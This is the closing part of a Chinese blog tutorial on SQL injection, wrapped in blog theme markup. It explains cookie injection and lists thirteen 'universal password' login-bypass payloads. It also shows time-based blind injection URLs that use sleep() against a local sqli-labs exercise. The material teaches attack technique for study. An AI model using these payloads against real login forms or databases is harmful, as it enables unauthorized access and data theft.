<h4 id="Cookie注入"><a href="#Cookie注入" class="headerlink" title="Cookie注入"></a>Cookie注入</h4><p>如今绝大部门开发人员在开发过程中会对用户传入的参数进行适当的过滤，但是很多时候，由于个人对安全技术了解的不同，有些开发人员只会对get，post这种方式提交的数据进行参数过滤。</p>
<p>但我们知道，很多时候，提交数据并非仅仅只有get / post这两种方式，还有一种经常被用到的方式：request(“xxx”),即request方法。通过这种方法一样可以从用户提交的参数中获取参数值，这就造成了cookie注入的最基本条件：使用了request方法，但是只对用户get / post提交的数据进行过滤。</p>
<p>我们这里有一个连接：<a target="_blank" rel="noopener" href="http://www.xx.com/search.asp?id=1">www.xx.com/search.asp?id=1</a></p>
<p>我们访问：<a target="_blank" rel="noopener" href="http://www.xx.com/srarch.asp">www.xx.com/srarch.asp</a>　发现不能访问，说缺少id参数。</p>
<p>我们将id=1放在cookie中再次访问，查看能否访问，如果能访问，则说明id参数可以通过cookie提交。</p>
<p>那么，如果后端没有对cookie中传入的数据进行过滤，那么，这个网站就有可能存在cookie注入了！</p>
<h4 id="过滤绕过"><a href="#过滤绕过" class="headerlink" title="过滤绕过"></a>过滤绕过</h4><p>待更新。</p>
<h4 id="传说中的万能密码"><a href="#传说中的万能密码" class="headerlink" title="传说中的万能密码"></a>传说中的万能密码</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">sql=&quot;select*from test where username=&#x27; XX &#x27;  and password=&#x27; XX &#x27;  &quot;;</span><br><span class="line">1：&quot;or &quot;a&quot;=&quot;a</span><br><span class="line">2： &#x27;)or(&#x27;a&#x27;=&#x27;a</span><br><span class="line">3：or 1=1--</span><br><span class="line">4：&#x27;or 1=1--</span><br><span class="line">5：a&#x27;or&#x27; 1=1--</span><br><span class="line">6：&quot;or 1=1--</span><br><span class="line">7：&#x27;or&#x27;a&#x27;=&#x27;a</span><br><span class="line">8：&quot;or&quot;=&quot;a&#x27;=&#x27;a</span><br><span class="line">9：&#x27;or&#x27;&#x27;=&#x27;</span><br><span class="line">10：&#x27;or&#x27;=&#x27;or&#x27;</span><br><span class="line">11：1 or &#x27;1&#x27;=&#x27;1&#x27;=1</span><br><span class="line">12：1 or &#x27;1&#x27;=&#x27;1&#x27; or 1=1</span><br><span class="line">13： &#x27;OR 1=1%00</span><br></pre></td></tr></table></figure>

<h2 id="注"><a href="#注" class="headerlink" title="注"></a>注</h2><p>Timing Attack注入，也就是时间盲注。通过简单的条件语句比如 and 1=2 是无法看出异常的。</p>
<p>在MySQL中，有一个Benchmark() 函数，它是用于测试性能的。Benchmark(count,expr) ，这个函数执行的结果，是将表达式 expr 执行 count 次 。</p>
<p>因此，利用benchmark函数，可以让同一个函数执行若干次，使得结果返回的时间比平时要长，通过时间长短的变化，可以判断注入语句是否执行成功。这是一种边信道攻击，这个技巧在盲注中被称为Timing Attack，也就是时间盲注。</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYgvfe"><img src="https://z3.ax1x.com/2021/06/27/RYgvfe.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYgvfe.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYgvfe.png"></a></p>
<p>利用前提：页面上没有显示位，也没有输出 SQL 语句执行错误信息。正确的 SQL 语句和错误的 SQL 语句返回页面都一样，但是加入 sleep(5)条件之后，页面的返回速度明显慢了 5 秒。</p>
<p>优点：不需要显示位，不需要出错信息。</p>
<p>缺点：速度慢，耗费大量时间</p>
<p>sleep 函数判断页面响应时间        if(判断条件，为true时执行，为false时执行)</p>
<p>我们可以构造下面的语句，判断条件是否成立。然后不断变换函数直到获取到我们想要的信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">//判断是否存在延时注入</span><br><span class="line">http://127.0.0.1/sqli/Less-1/?id=1&#x27; and sleep(5)#</span><br><span class="line"> </span><br><span class="line">// 判断数据库的第一个字符的ascii值是否大于100，如果大于100，页面立即响应，如果不大于，页面延时5秒响应</span><br><span class="line">http://127.0.0.1/sqli/Less-1/?id=1&#x27;andif(ascii(substring(database(),1,1))&lt;100,1,sleep(5)) #</span><br></pre></td></tr></table></figure>



<h2 id="感谢"><a href="#感谢" class="headerlink" title="感谢"></a>感谢</h2><p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s?__biz=Mzg3MTA1NDMxMw==&mid=100000183&idx=1&sn=414bda2e22753a9bd5a57ffebd3e0e8c&chksm=4e852f3179f2a627eecaffb02969a8435b3b3e737cf26d631581d86f976a58efe103c1757335&mpshare=1&scene=23&srcid=0625mQzmrBAli11fDcmAk4Zb&sharer_sharetime=1624580435225&sharer_shareid=cf169812543d2d844bcc7a739c22d12e#rd">https://mp.weixin.qq.com/s?__biz=Mzg3MTA1NDMxMw==&amp;mid=100000183&amp;idx=1&amp;sn=414bda2e22753a9bd5a57ffebd3e0e8c&amp;chksm=4e852f3179f2a627eecaffb02969a8435b3b3e737cf26d631581d86f976a58efe103c1757335&amp;mpshare=1&amp;scene=23&amp;srcid=0625mQzmrBAli11fDcmAk4Zb&amp;sharer_sharetime=1624580435225&amp;sharer_shareid=cf169812543d2d844bcc7a739c22d12e#rd</a></p>

      </div>
      <div class="post-tags-categories">
        
        <div class="tags">
          
            <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" class="">
              SQL注入
            </a>
          
        </div>
        
      </div>
      
        <div class="copyright">
  <ul class="post-copyright">
    <li class="post-copyright-author">
    <strong>作者:  </strong>阳阳</a>
    </li>
    <li class="post-copyright-link">
    <strong>文章链接:  </strong>
    <a href="/2021/06/27/2020-12-17-sql-zhu-ru-lou-dong-xiang-jie/" target="_blank" title="SQL注入漏洞详解">https://yangyang-linux.gitee.io/2021/06/27/2020-12-17-sql-zhu-ru-lou-dong-xiang-jie/</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明:   </strong>
      本网站所有文章除特别声明外,均采用 <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">CC BY-NC-ND 4.0</a>
      许可协议。转载请注明出处!
    </li>
  </ul>
<div>
      
    </article>
    <!-- 上一篇文章和下一篇文章 -->
    
      <!-- 文章详情页的上一页和下一页 -->
<div class="post-nav">



  
  <div class="post-nav-prev post-nav-item">
    <div class="post-nav-img" style="background-size: cover; 
      background-position: center center;">
      <img class="lazyload lazyload placeholder" src="/medias/11.jpg" class="lazyload placeholder" data-srcset="/medias/11.jpg" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="">
    </div>
    <a href="/2021/07/04/2021-07-04-ping-ke-jiao-ben/" class="post-nav-link">
      <div class="title">
        <i class="fas fa-angle-left"></i> 上一篇:
        <div class="title-text">评课脚本</div>
      </div>
      
      <!-- <div class="content">
        源码1234567891011var i=1; while(i&lt;=50)&#123;	if(document.ge
      </div> -->
    </a>
  </div>



  
  <div class="post-nav-next post-nav-item">
    <div class="post-nav-img" style="background-size: cover; 
      background-position: center center;">
      <img class="lazyload lazyload placeholder" src="/medias/13.jpg" class="lazyload placeholder" data-srcset="/medias/13.jpg" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" src="" alt="">
    </div>
    <a href="/2021/06/23/2021-06-23-ctf-zhi-web-ji-chu-zhi-shi/" class="post-nav-link">
      <div class="title">
        下一篇: <i class="fas fa-angle-right"></i>
        <div class="title-text">ctf之web基础知识</div>
      </div>
      <!-- <div class="content">
        一、基础知识
CTF 简介
竞赛模式
比赛形式
题目类型

二、web 前置技能1. HTTP 协议
请求方式
http
      </div> -->
    </a>
  </div>

</div>

    
    

    <!-- 打赏 -->
    
      <div id="appDonate" class="post-donate">
  <div id="donate_board" class="donate_bar center" ref="donate">
    <a id="btn_donate" class="btn_donate" href="javascript:;" title="打赏" @click="showDialogDrawer()"></a>
  </div>
  <transition name="fade">
    <div 
      class="donate-box-mask"
      v-cloak 
      v-show="visible"
      @click="cancelDialogDrawer()"
    >
    </div>
  </transition>
  <transition name="bounce">
    <div class="donate-box" v-cloak v-show="visible">
      <div class="donate-box_close">
        <i class="fas fa-times" aria-hidden="true" @click="cancelDialogDrawer" pointer></i>
      </div>
      <div class="donate-box_title">
        <h4>
          你的赏识是我前进的动力
        </h4>
      </div>
      <div class="donate-box_tab">
        <div class="Alipay" pointer :class="{'active': tabActive === 'Alipay'}" @click="changeTabActive('Alipay')">
          支付宝
        </div>
        <div class="WeChatpay" pointer :class="{'active': tabActive === 'WeChatpay'}" @click="changeTabActive('WeChatpay')">
          微信
        </div>
      </div>
      <div class="donate-box_img">
        <div class="AlipayImg" v-show="tabActive === 'Alipay'">
          <img src="/medias/zfb.jpg" class="lazyload placeholder" data-srcset="/medias/zfb.jpg" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="支付宝打赏" />
        </div> 
        <div class="WeChatpayImg" v-show="tabActive === 'WeChatpay'">
          <img src="/medias/wx.jpg" class="lazyload placeholder" data-srcset="/medias/wx.jpg" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="微信打赏" />
        </div>
      </div>
    </div>
  </transition>
</div>

<script>
  var body = document.body || document.documentElement || window;
  var vm = new Vue({
    el: '#appDonate',
    data: {
      visible: false,
      tabActive: 'Alipay',
      top: 0,
    },
    computed: {
    },
    mounted() {
    },
    methods: {
      showDialogDrawer() {
        this.visible = true;
        // 防止页面滚动，只能让弹框滚动
        // function getScroll() {
        //   return {
        //     left: window.pageXOffset || document.documentElement.scrollLeft || document.body.scrollLeft || 0,
        //     top: window.pageYOffset || document.documentElement.scrollTop || document.body.scrollTop || 0
        //   };
        // }
        this.top = $(document).scrollTop() // or getScroll().top
        // console.log('aa', $('.main-content'));
        body.style.cssText = 'overflow: hidden;';
      },
      cancelDialogDrawer() {
        this.visible = false;
        body.removeAttribute('style');
        $(document).scrollTop(this.top)
      },
      changeTabActive(name) {
        this.tabActive = name;
      }
    },
    created() {}
  })
</script>
    

    <!-- 分享 -->
    
      <!-- https://github.com/overtrue/share.js -->
<!-- 文章详情页的分享 -->
<div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>

<script src="/js/shareJs/social-share.min.js"></script>
</script>

<style>
  .social-share {
    margin: 20px 0;
  }
</style>


    
    
    <!-- 评论 -->
    <!-- 评论 -->

  <div id="myComment">
    
      
<section id="comments" style="padding: 1em; margin: 15px auto;"
	class="animated bounceInUp">
	<div id="vcomment" class="comment"></div>
</section>
<style>
	#comments {
		background: rgba(255,255,255,0.9);
	}
	#veditor {
		background-image: url('https://img.zcool.cn/community/01a253594c71cfa8012193a329a77f.gif');
		background-size: contain;
		background-repeat: no-repeat;
		background-position: right;
		background-color: rgba(255, 255, 255, 0);
		resize: vertical;
	}
	#veditor:focus{
		background-position-y: 200px;
		transition: all 0.2s ease-in-out 0s;
	}
	#vcomment .vcards .vcard .vh .vhead .vtag.vvisitor {
		background-color: #42b983;
	}
	.v[data-class=v] .vbtn:active, .v[data-class=v] .vbtn:hover {
		color: #42b983;
		border-color: #42b983;
	}
	#vcomment .vcards .vcard .vhead .vsys i {
		display: none;
	}
	/* 底部valine链接 */
	#vcomment .vpower {
		display: none;
	}
	
	/* 底下注释是修改 名称和邮箱和网址输入框的样式 */
	/* #vcomment .vheader {
		display: flex;
		justify-content: space-around;
	}
	
	#vcomment .vheader .vnick {
		width: 31%;
		border: 2px solid #dedede;
		padding-left: 10px;
		padding-right: 10px;
		border-radius: 5px
	}

	#vcomment .vheader .vmail {
		width: 31%;
		border: 2px solid #dedede;
		padding-left: 10px;
		padding-right: 10px;
		border-radius: 5px
	}

	#vcomment .vheader .vlink {
		width: 31%;
		border: 2px solid #dedede;
		padding-left: 10px;
		padding-right: 10px;
		border-radius: 5px
	} */

	img.vimg {
		transition: all 1s;
		/* 头像旋转时间为 1s */
	}

	img.vimg:hover {
		transform: rotate(360deg);
		-webkit-transform: rotate(360deg);
		-moz-transform: rotate(360deg);
		-o-transform: rotate(360deg);
		-ms-transform: rotate(360deg);
	}

	#vcomment .vcards .vcard {
		padding: 15px 20px 0 20px;
		border-radius: 10px;
		margin-bottom: 15px;
		box-shadow: 0 0 4px 1px rgba(0, 0, 0, .12);
		transition: all .3s
	}

	#vcomment .vcards .vcard:hover {
		box-shadow: 0 0 8px 3px rgba(0, 0, 0, .12)
	}

	#vcomment .vcards .vcard .vh .vcard {
		border: none;
		box-shadow: none;
	}
</style>
    
  </div>

<!-- comment script in themes\hexo-theme-bamboo\layout\_partial\scripts\index.ejs -->


  </div>

  <!-- 目录 -->
  <!-- 文章详情页右侧目录 -->

  <div class="toc-aside">
    <div class="toc-main">
      <div class="toc-aside-title">
        <i class="fas fa-list-ul" aria-hidden="true"></i><span>本文目录</span>
        
          <div class="toc-open-close">本文目录</div>
        
      </div>
      <div class="toc-content">
        <div class="toc"></div>
      </div>
    </div>
  </div>

  <!-- 手机端目录按钮 -->
  <div id="toc-mobile-btn">
    <i class="fas fa-list-ul" aria-hidden="true"></i>
  </div>


<script>
  function closeToc(init) {
    $(".toc-aside").css({'width': 0, 'padding': 0, 'transition': init ?  'noe' : 'width 0.3s' });
    $(".toc-content").css({'width': 0});
    $(".toc-aside-title span, .toc-aside-title i").css({'display': 'none'});
    $(".main-content").css({'width': '75%', 'margin': '10px auto'});
  };
  function openToc() {
    $(".main-content").css({'width': '65%', 'margin-right': '10px', 'margin-left': 'calc(35% - 350px)'});
    $(".toc-aside").css({'width': '300px', 'padding': '0 10px', 'transition': 'width 0.3s'});
    $(".toc-content").css({'width': '300px'});
    $(".toc-aside-title span, .toc-aside-title i").css({'display': 'inline-block'});
  }
  function openBtnClickFn () {
    let openOrCloseBtn = $('.toc-aside .toc-aside-title .toc-open-close');
    let open = eval('' || 'false');
    openOrCloseBtn.click(function() {
      if (open) {
        closeToc();
        open = false;
      } else {
        openToc();
        open = true;
      }
    });
  };
  openBtnClickFn();
  initCloseTocWidth(true);

  function initCloseTocWidth(init) {
    if (window.innerWidth >= 992) {
      let isClose = true;
      isClose && closeToc(init)
    }
  }

  document.addEventListener('pjax:complete', function () {
    $(".toc-aside").css({'transition': 'no'});
  })
  document.addEventListener('pjax:complete', function () {
    openBtnClickFn();
  })
  
</script>

  <!-- 图片放大 Wrap images with fancybox support -->
  <script src="/js/wrapImage.js"></script>
</div>

<!-- 文章详情页背景图 -->
<div id="appBgSwiper" style="position: fixed;left: 0;top: 0;width: 100%;height: 100%;z-index: -2;"
	:style="{'background-color': bgColor ? bgColor : 'transparent'}">
	<transition-group tag="ul" :name="names">
		<li v-for='(image,index) in img' :key='index' v-show="index === mark" class="bg-swiper-box">
			<img :src="image" class="bg-swiper-img no-lazy">
		</li>
	</transition-group>
</div>
<script>
	var vm = new Vue({
		el: '#appBgSwiper',
		data: {
			names: '' || 'fade' || 'fade', // translate-fade fade
			mark: 0,
			img: [],
			bgColor: '',
			time: null
		},
		methods: {   //添加方法
			change(i, m) {
				if (i > m) {
					// this.names = 'fade';
				} else if (i < m) {
					// this.names = 'fade';
				} else {
					return;
				}
				this.mark = i;
			},
			prev() {
				// this.names = 'fade';
				this.mark--;
				if (this.mark === -1) {
					this.mark = 3;
					return
				}
			},
			next() {
				// this.names = 'fade';
				this.mark++;
				if (this.mark === this.img.length) {
					this.mark = 0;
					return
				}
			},
			autoPlay() {
				// this.names = 'fade';
				this.mark++;
				if (this.mark === this.img.length) {
					this.mark = 0;
					return
				}
			},
			play() {
				let bgImgDelay = '' || '180000'
				let delay = parseInt(bgImgDelay) || 180000;
				this.time = setInterval(this.autoPlay, delay);
			},
			enter() {
				clearInterval(this.time);
			},
			leave() {
				this.play();
			}
		},
		created() {
			this.play()
		},
		beforeDestroy() {
			clearInterval(this.time);
		},
		mounted() {
			let prop = '' || 'https://pic4.zhimg.com/80/v2-5030587bac1b856d09e0a119ff6d7c04_1440w.jpg,https://api.btstu.cn/sjbz/api.php';
			let isImg = prop.includes('.bmp') || prop.includes('.jpg') || prop.includes('.png') || prop.includes('.tif') || prop.includes('.gif') || prop.includes('.pcx') || prop.includes('.tga') || prop.includes('.exif') || prop.includes('.fpx') || prop.includes('.psd') || prop.includes('.cdr') || prop.includes('.pcd') || prop.includes('.dxf') || prop.includes('.ufo') || prop.includes('.eps') || prop.includes('.ai') || prop.includes('.raw') || prop.includes('.WMF') || prop.includes('.webp') || prop.includes('.jpeg') || prop.includes('http://') || prop.includes('https://')
			if (isImg) {
				let img = prop.split(',');
				let configRoot = '/'
				let arrImg = [];
				img.forEach(el => {
					var Expression = /http(s)?:\/\/([\w-]+\.)+[\w-]+(\/[\w- .\/?%&=]*)?/;
					var objExp = new RegExp(Expression);

					if (objExp.test(el)) {
						// http or https
						arrImg.push(el);
					} else {
						// 非http or https开头
						// 本地文件
						let firstStr = el.charAt(0);
						if (firstStr == '/') {
							el = el.substr(1); // 删除第一个字符 '/',因为 configRoot最后一个字符为 /
						}
						el = configRoot + el;
						arrImg.push(el);
					}
				})
				this.img = arrImg;
			} else {
				this.bgColor = prop;
			}
		}
	})
</script>

<style>
	.bg-swiper-box {
		position: absolute;
		display: block;
		width: 100%;
		height: 100%;
	}

	.bg-swiper-img {
		object-fit: cover;
		width: 100%;
		height: 100%;
	}
</style>




  <script>
  function loadMermaid() {
    if (document.getElementsByClassName('mermaid').length) {
      if (window.mermaidJsLoad) mermaid.init()
      else {
        loadScript('https://cdnjs.cloudflare.com/ajax/libs/mermaid/8.6.3/mermaid.min.js').then(() => {
          window.mermaidJsLoad = true
          mermaid.initialize({
            theme: 'default',
          })
          if ('true') {
            mermaid.init();
          }
        })
      }
    }
  };
  document.addEventListener("DOMContentLoaded", function () {
    loadMermaid();
  })

  document.addEventListener('pjax:complete', function () {
    loadMermaid();
  })
  
</script>


      </main>
    </div>

    <!-- 页脚 -->
    
  
  <!-- 底部鱼儿跳动效果，依赖于jquery-->
<div id="j-fish-skip" style=" position: relative;height: 153px;width: auto;"></div>
<script>
  var RENDERER = {
    POINT_INTERVAL: 5,
    FISH_COUNT: 3,
    MAX_INTERVAL_COUNT: 50,
    INIT_HEIGHT_RATE: .5,
    THRESHOLD: 50,
    FISH_COLOR: '',
    init: function () {
      this.setFishColor(); this.setParameters(), this.reconstructMethods(), this.setup(), this.bindEvent(), this.render()
    },
    setFishColor: function () {
      let isDark = JSON.parse(localStorage.getItem('dark')) || JSON.parse('false');
      if (isDark) {
        this.FISH_COLOR = '#222'; // 暗黑色，有时间把这整成一个变量
      } else {
        this.FISH_COLOR = '' || '#42b983';
      }
    },
    setParameters: function () {
      this.$window = $(window), this.$container = $("#j-fish-skip"), this.$canvas = $("<canvas />"), this.context = this.$canvas.appendTo(this.$container).get(0).getContext("2d"), this.points = [], this.fishes = [], this.watchIds = []
    },
    createSurfacePoints: function () {
      var t = Math.round(this.width / this.POINT_INTERVAL);
      this.pointInterval = this.width / (t - 1), this.points.push(new SURFACE_POINT(this, 0));
      for (var i = 1; i < t; i++) {
        var e = new SURFACE_POINT(this, i * this.pointInterval),
          h = this.points[i - 1];
        e.setPreviousPoint(h), h.setNextPoint(e), this.points.push(e)
      }
    },
    reconstructMethods: function () {
      this.watchWindowSize = this.watchWindowSize.bind(this), this.jdugeToStopResize = this.jdugeToStopResize.bind(this), this.startEpicenter = this.startEpicenter.bind(this), this.moveEpicenter = this.moveEpicenter.bind(this), this.reverseVertical = this.reverseVertical.bind(this), this.render = this.render.bind(this)
    },
    setup: function () {
      this.points.length = 0, this.fishes.length = 0, this.watchIds.length = 0, this.intervalCount = this.MAX_INTERVAL_COUNT, this.width = this.$container.width(), this.height = this.$container.height(), this.fishCount = this.FISH_COUNT * this.width / 500 * this.height / 500, this.$canvas.attr({
        width: this.width,
        height: this.height
      }), this.reverse = !1, this.fishes.push(new FISH(this)), this.createSurfacePoints()
    },
    watchWindowSize: function () {
      this.clearTimer(), this.tmpWidth = this.$window.width(), this.tmpHeight = this.$window.height(), this.watchIds.push(setTimeout(this.jdugeToStopResize, this.WATCH_INTERVAL))
    },
    clearTimer: function () {
      for (; this.watchIds.length > 0;) clearTimeout(this.watchIds.pop())
    },
    jdugeToStopResize: function () {
      var t = this.$window.width(),
        i = this.$window.height(),
        e = t == this.tmpWidth && i == this.tmpHeight;
      this.tmpWidth = t, this.tmpHeight = i, e && this.setup()
    },
    bindEvent: function () {
      this.$window.on("resize", this.watchWindowSize), this.$container.on("mouseenter", this.startEpicenter), this.$container.on("mousemove", this.moveEpicenter)
    },
    getAxis: function (t) {
      var i = this.$container.offset();
      return {
        x: t.clientX - i.left + this.$window.scrollLeft(),
        y: t.clientY - i.top + this.$window.scrollTop()
      }
    },
    startEpicenter: function (t) {
      this.axis = this.getAxis(t)
    },
    moveEpicenter: function (t) {
      var i = this.getAxis(t);
      this.axis || (this.axis = i), this.generateEpicenter(i.x, i.y, i.y - this.axis.y), this.axis = i
    },
    generateEpicenter: function (t, i, e) {
      if (!(i < this.height / 2 - this.THRESHOLD || i > this.height / 2 + this.THRESHOLD)) {
        var h = Math.round(t / this.pointInterval);
        h < 0 || h >= this.points.length || this.points[h].interfere(i, e)
      }
    },
    reverseVertical: function () {
      this.reverse = !this.reverse;
      for (var t = 0, i = this.fishes.length; t < i; t++) this.fishes[t].reverseVertical()
    },
    controlStatus: function () {
      for (var t = 0, i = this.points.length; t < i; t++) this.points[t].updateSelf();
      for (t = 0, i = this.points.length; t < i; t++) this.points[t].updateNeighbors();
      this.fishes.length < this.fishCount && 0 == --this.intervalCount && (this.intervalCount = this.MAX_INTERVAL_COUNT, this.fishes.push(new FISH(this)))
    },
    render: function () {
      requestAnimationFrame(this.render), this.controlStatus(), this.context.clearRect(0, 0, this.width, this.height), this.context.fillStyle = this.FISH_COLOR;
      for (var t = 0, i = this.fishes.length; t < i; t++) this.fishes[t].render(this.context);
      this.context.save(), this.context.globalCompositeOperation = "xor", this.context.beginPath(), this.context.moveTo(0, this.reverse ? 0 : this.height);
      for (t = 0, i = this.points.length; t < i; t++) this.points[t].render(this.context);
      this.context.lineTo(this.width, this.reverse ? 0 : this.height), this.context.closePath(), this.context.fill(), this.context.restore()
    }
  },
  SURFACE_POINT = function (t, i) {
    this.renderer = t, this.x = i, this.init()
  };
  SURFACE_POINT.prototype = {
    SPRING_CONSTANT: .03,
    SPRING_FRICTION: .9,
    WAVE_SPREAD: .3,
    ACCELARATION_RATE: .01,
    init: function () {
      this.initHeight = this.renderer.height * this.renderer.INIT_HEIGHT_RATE, this.height = this.initHeight, this.fy = 0, this.force = {
        previous: 0,
        next: 0
      }
    },
    setPreviousPoint: function (t) {
      this.previous = t
    },
    setNextPoint: function (t) {
      this.next = t
    },
    interfere: function (t, i) {
      this.fy = this.renderer.height * this.ACCELARATION_RATE * (this.renderer.height - this.height - t >= 0 ? -1 : 1) * Math.abs(i)
    },
    updateSelf: function () {
      this.fy += this.SPRING_CONSTANT * (this.initHeight - this.height), this.fy *= this.SPRING_FRICTION, this.height += this.fy
    },
    updateNeighbors: function () {
      this.previous && (this.force.previous = this.WAVE_SPREAD * (this.height - this.previous.height)), this.next && (this.force.next = this.WAVE_SPREAD * (this.height - this.next.height))
    },
    render: function (t) {
      this.previous && (this.previous.height += this.force.previous, this.previous.fy += this.force.previous), this.next && (this.next.height += this.force.next, this.next.fy += this.force.next), t.lineTo(this.x, this.renderer.height - this.height)
    }
  };
  var FISH = function (t) {
    this.renderer = t, this.init()
  };
  FISH.prototype = {
    GRAVITY: .4,
    init: function () {
      this.direction = Math.random() < .5, this.x = this.direction ? this.renderer.width + this.renderer.THRESHOLD : -this.renderer.THRESHOLD, this.previousY = this.y, this.vx = this.getRandomValue(4, 10) * (this.direction ? -1 : 1), this.renderer.reverse ? (this.y = this.getRandomValue(1 * this.renderer.height / 10, 4 * this.renderer.height / 10), this.vy = this.getRandomValue(2, 5), this.ay = this.getRandomValue(.05, .2)) : (this.y = this.getRandomValue(6 * this.renderer.height / 10, 9 * this.renderer.height / 10), this.vy = this.getRandomValue(-5, -2), this.ay = this.getRandomValue(-.2, -.05)), this.isOut = !1, this.theta = 0, this.phi = 0
    },
    getRandomValue: function (t, i) {
      return t + (i - t) * Math.random()
    },
    reverseVertical: function () {
      this.isOut = !this.isOut, this.ay *= -1
    },
    controlStatus: function (t) {
      this.previousY = this.y, this.x += this.vx, this.y += this.vy, this.vy += this.ay, this.renderer.reverse ? this.y > this.renderer.height * this.renderer.INIT_HEIGHT_RATE ? (this.vy -= this.GRAVITY, this.isOut = !0) : (this.isOut && (this.ay = this.getRandomValue(.05, .2)), this.isOut = !1) : this.y < this.renderer.height * this.renderer.INIT_HEIGHT_RATE ? (this.vy += this.GRAVITY, this.isOut = !0) : (this.isOut && (this.ay = this.getRandomValue(-.2, -.05)), this.isOut = !1), this.isOut || (this.theta += Math.PI / 20, this.theta %= 2 * Math.PI, this.phi += Math.PI / 30, this.phi %= 2 * Math.PI), this.renderer.generateEpicenter(this.x + (this.direction ? -1 : 1) * this.renderer.THRESHOLD, this.y, this.y - this.previousY), (this.vx > 0 && this.x > this.renderer.width + this.renderer.THRESHOLD || this.vx < 0 && this.x < -this.renderer.THRESHOLD) && this.init()
    },
    render: function (t) {
      t.save(), t.translate(this.x, this.y), t.rotate(Math.PI + Math.atan2(this.vy, this.vx)), t.scale(1, this.direction ? 1 : -1), t.beginPath(), t.moveTo(-30, 0), t.bezierCurveTo(-20, 15, 15, 10, 40, 0), t.bezierCurveTo(15, -10, -20, -15, -30, 0), t.fill(), t.save(), t.translate(40, 0), t.scale(.9 + .2 * Math.sin(this.theta), 1), t.beginPath(), t.moveTo(0, 0), t.quadraticCurveTo(5, 10, 20, 8), t.quadraticCurveTo(12, 5, 10, 0), t.quadraticCurveTo(12, -5, 20, -8), t.quadraticCurveTo(5, -10, 0, 0), t.fill(), t.restore(), t.save(), t.translate(-3, 0), t.rotate((Math.PI / 3 + Math.PI / 10 * Math.sin(this.phi)) * (this.renderer.reverse ? -1 : 1)), t.beginPath(), this.renderer.reverse ? (t.moveTo(5, 0), t.bezierCurveTo(10, 10, 10, 30, 0, 40), t.bezierCurveTo(-12, 25, -8, 10, 0, 0)) : (t.moveTo(-5, 0), t.bezierCurveTo(-10, -10, -10, -30, 0, -40), t.bezierCurveTo(12, -25, 8, -10, 0, 0)), t.closePath(), t.fill(), t.restore(), t.restore(), this.controlStatus(t)
    }
  }, $(function () {
    RENDERER.init()
    $('.dark').click(function () {
      setTimeout(() => {
        RENDERER.setFishColor();
        RENDERER.context.fill();
      });
    })
  });
</script>
  <div class="footer bg-color">
    <div class="footer-main">
      
        
          <div class="link">
            
              
                <a href="mailto:2985409357@qq.com" class="social">
                  
                    <i class="fa fa-envelope" aria-hidden="true"></i>
                  
                </a>
              
            
              
                <a target="_blank" rel="noopener" href="https://github.com/yangyang-linux" class="social">
                  
                    <i class="fab fa-github" aria-hidden="true"></i>
                  
                </a>
              
            
              
                <a href="tencent://AddContact/?fromId=50&amp;fromSubId=1&amp;subcmd=all&amp;uin=2985409357" class="social">
                  
                    <i class="fab fa-qq" aria-hidden="true"></i>
                  
                </a>
              
            
          </div>
        
      
        
          <div class="footer-copyright">
            <p>Copyright © 2019 - <span id="display_copyright_time"></span> <a target="_blank" rel="noopener" href="https://gitee.com/yangyang-linux">yangyang-linux</a> | Powered by <a target="_blank" rel="noopener" href="https://hexo.io/zh-cn/docs/">Hexo</a> | Theme <a target="_blank" rel="noopener" href="https://github.com/yuang01/theme">Bamboo</a></p>

          </div>
        
      
        
          
            <!-- 不蒜子统计 -->
            <!-- 不蒜子统计 -->
<span id="busuanzi_container_site_pv">
      <i class="fas fa-eye" aria-hidden="true"></i>本站总访问量：<span id="busuanzi_value_site_pv"></span> 次
</span>
<span class="post-meta-divider">|</span>
<span id="busuanzi_container_site_uv" style='display:none'>
      <i class="fas fa-users" aria-hidden="true"></i>本站访客数：<span id="busuanzi_value_site_uv"></span> 人
</span>

          
        
      
        
          <div class="footer-custom">
            
              <div><p><span>本博客已萌萌哒地运行</span><span id="display_live_time"></span></p>
</div>
            
          </div>
        
      
		</br>
		</br>
		</br>
    </div>
  </div>



    <!-- 渲染暗黑按钮 -->
    
      <div class="dark">
  <div class="dark-content">
    <i class="fas fa-moon" aria-hidden="true"></i>
    <!-- <span>关灯</span> -->
  </div>
  
</div>

<script>
  $(function() {
    let isDark = JSON.parse(localStorage.getItem('dark'))  || JSON.parse('false');
    if (isDark) {
      $(".dark-content").replaceWith(
          `
          <div class='dark-content'>
            <i class="fas fa-lightbulb" aria-hidden="true"></i>
          </div>
          `
        );
    }
    $('.dark').click(function() {
      if ($(document.body).is('.darkModel')) {
        $(document.body).removeClass('darkModel');
        localStorage.setItem('dark', false);
        $(".dark-content").replaceWith(
          `
          <div class='dark-content'>
